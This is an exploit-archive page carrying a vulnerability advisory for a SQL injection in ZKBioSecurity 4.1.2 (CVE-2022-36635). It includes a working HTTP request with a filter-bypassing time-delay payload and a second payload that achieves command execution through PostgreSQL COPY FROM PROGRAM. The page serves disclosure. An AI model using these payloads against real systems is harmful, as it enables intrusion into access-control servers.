what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution
Posted Oct 1, 2022
Authored by Silton Santos, Caio Burgardt

ZKSecurity BIO version 4.1.2 suffers from a remote SQL injection vulnerability that can allow for remote code execution.

tags | exploit, remote, code execution, sql injection
advisories | CVE-2022-36635
SHA-256 | 2f5ddba7cf7e3024ddc6ad5a39968b8c149a652831c65c828f1565ea29f0e84d

ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

Change Mirror Download
#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco (
https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2)

Version Affected: 4.1.2

CVE: CVE-2022-36635

Vulnerability: SQL Injection (with a plus: RCE)

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQL
query, with only a sanitization filter in front of it. Using comments
(/**/) in place of spaces was enough to confuse and bypass the filter.

#######################PROOF OF CONCEPT#######################

Note that the request delayed 10s:

POST /baseOpLog.do HTTP/1.1

Host: {HOST}

Content-Type: application/x-www-form-urlencoded

Cookie: SESSION={COOKIE}; menuType=icon-only

Content-Length: 208

list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50

if you use the next query, you can execute remote command:

list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'='


#######################END#######################

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    0 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close